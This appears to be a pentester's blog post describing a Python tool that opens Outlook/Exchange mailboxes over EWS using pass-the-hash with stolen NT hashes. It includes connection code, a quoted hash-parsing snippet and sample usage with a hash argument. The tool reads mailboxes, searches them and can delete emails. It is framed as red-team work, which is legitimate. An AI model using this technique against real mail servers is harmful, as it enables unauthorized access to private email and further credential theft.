During pentests/red team events, when you manage to get NT hashes (not Net-NTLM by the way, too many blog posts confuse the two), you basically can abuse them using pass the hash to do almost everything.

Libraries like Impacket are great for this. One thing I found missing was being able to open user's Outlook/Exchange mailboxes (harvesting mailboxes may reveal quite some creds/etc..). No "email client" seemed to exist to abuse PtH with NTLM

Within internal LANs, I found that Kerberos was often required (ptt is a solution also there but different conditions apply), however, most of EWS (Exchange Web Services, API to access Exchange) URL endpoints are configured supporting NTLM authentication.

Discovering the EWS URL endpoint of a domain (if they have it exposed) is usually straitforward. It is documented by Microsoft and should be found using well known "auto-discovery" URLs [Microsoft doc](https://docs.microsoft.com/en-us/exchange/client-developer/exchange-web-services/autodiscover-for-exchange).

Once you get the Enpoint URL, if trying to access it, sends you back a 401 response similar to this:
```http
HTTP/1.1 401 Unauthorized
WWW-Authenticate: NTLM
```
You know NTLM auth is available on your EWS endpoint, hence a potential access to mailboxes/calendars using Pass-The-Hash.

Next thing is to code some sort of minimal email client. I initially thought it would be pretty painful to cope with an NTLM over HTTP and a MAPI implementation (see Sensepost ruler at [Sensepost code](https://github.com/sensepost/ruler), congrats guys for doing all this MAPI work!). However, python has some libs that are here doing already all the heavy work!

The library I used is `exchangelib`, it is implementing all the MAPI calls and turned out that it uses the `requests_ntlm` library either.

I thought I would then just need to modify `requests_ntlm` to support pass-the-hash but checking into its source, turned out that is uses `ntlm_auth` which itself has, lightly documented in the code only, support for passing the hash :)! See on line 24 [there](https://github.com/jborean93/ntlm-auth/blob/master/ntlm_auth/compute_hash.py):
```python
    # if the password is a hash, return the LM hash
    if re.match(r'^[a-fA-F\d]{32}:[a-fA-F\d]{32}$', password):
        lm_hash = binascii.unhexlify(password.split(':')[0])
        return lm_hash
```

## 1. Connect using Exchangelib and PtH NTLM/HTTP

Pretty straightforward, taking an email (username) and an LM/NT hash (LM hash is not used anymore, could hardcode it or just paste the fake one retreived when you dumped it):

```python
try:
    from exchangelib import DELEGATE, IMPERSONATION, Account, Credentials, ServiceAccount, EWSDateTime, EWSTimeZone, Configuration, NTLM, CalendarItem, Message, Mailbox, Attendee, Q, ExtendedProperty, FileAttachment, ItemAttachment,HTMLBody, Build, Version
except:
    print "exchangelib error, verify it is properly installed: pip install exchangelib"
    raise SystemExit

if __name__ == '__main__':
    arguments=arg_parse()
    credentials = Credentials(username=arguments.USERNAME, password=arguments.HASH)
    print '[+] Connecting..'

    try:
        my_account = Account(primary_smtp_address=arguments.MAILBOX, credentials=credentials, autodiscover=True, access_type=DELEGATE)
    except:
        print "Account is maybe locked, has no mailbox or password/hash is wrong"
        raise SystemExit
    print '[+] Connected!'
```

## 2. Add a client side prompt to navigate the mailbox

See in code the `MapiPrompt` class, just simulating a very light email/outlook type client in a terminal env

## 3. Example

Sample output:

```python
./outlook_pth.py -l user_email@domain.com -p aad3d435b51424eeaad3b435b54404ee:3cfb588daa004efc6baf3891cce43214
[+] Outlook_Pth version 0.5
[+] Connecting..
[+] Connected!
Starting MAPI prompt..
> help
Documented commands (type help <topic>):
========================================
deleteEmail  getEmail       help               printRootFolders  writeToFile
exit         getLastEmails  printInboxFolders  printEmail  searchMailbox

> help getLastEmails

        Print Subject of last n emails in folder 'folder_name' (default: 10 "Inbox")

        ex: getLastEmails 20 "Sent Items"
>
```

